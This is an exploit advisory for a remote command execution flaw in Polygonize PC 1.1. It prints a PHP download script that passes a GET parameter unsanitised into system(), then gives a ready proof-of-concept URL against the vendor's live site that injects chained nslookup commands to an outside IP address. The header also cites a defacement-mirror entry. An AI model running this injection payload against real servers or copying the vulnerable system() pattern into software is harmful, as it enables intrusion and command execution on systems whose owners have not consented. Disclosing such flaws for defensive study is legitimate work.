Polygonize PC 1.1 Remote Command Execution

Polygonize PC version 1.1 suffers from a remote command execution vulnerability.


MD5 | 7c73f4a69f6242e7dc14c93875b326b5

============================================================================================================================
| # Title : Polygonize PC v1.1 RCE Vulnerability |
| # Author : indoushka |
| # email : [email protected] |
| # Tested on : windows 10 FranASSais V.(Pro) |
| # Version : 1.1 |
| # Vendor : http://polygonize.net/ |
| # Dork : http://www.zone-h.org/mirror/id/30699471 |
============================================================================================================================

poc :

<?
/*************************************
* Code to download JPGs, PDFs, etc
* www.sometricks.com
*************************************/
$file = $_GET['file'];
$file2 = "/var/www/cartoonize.net/web/tmp/".$_GET['file'];
system("/usr/bin/composite -gravity SouthEast watermark.png $file $file");

if(@is_array(getimagesize($file))){
$image = true;
} else {
$image = false;
}
//print_r(getimagesize($file2));
//exit();
if ($image==true) {
header ("Content-type: octet/stream");
header ("Content-disposition: attachment; filename=".$file.";");
header("Content-Length: ".filesize($file));
readfile($file);
}
else echo "Wrong image type";
exit;
?>

http://polygonize.net//download.php?file=nslookup%20213.32.6.8|nslookup%20213.32.6.8%26nslookup%20213.32.6.8


Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================

Related Posts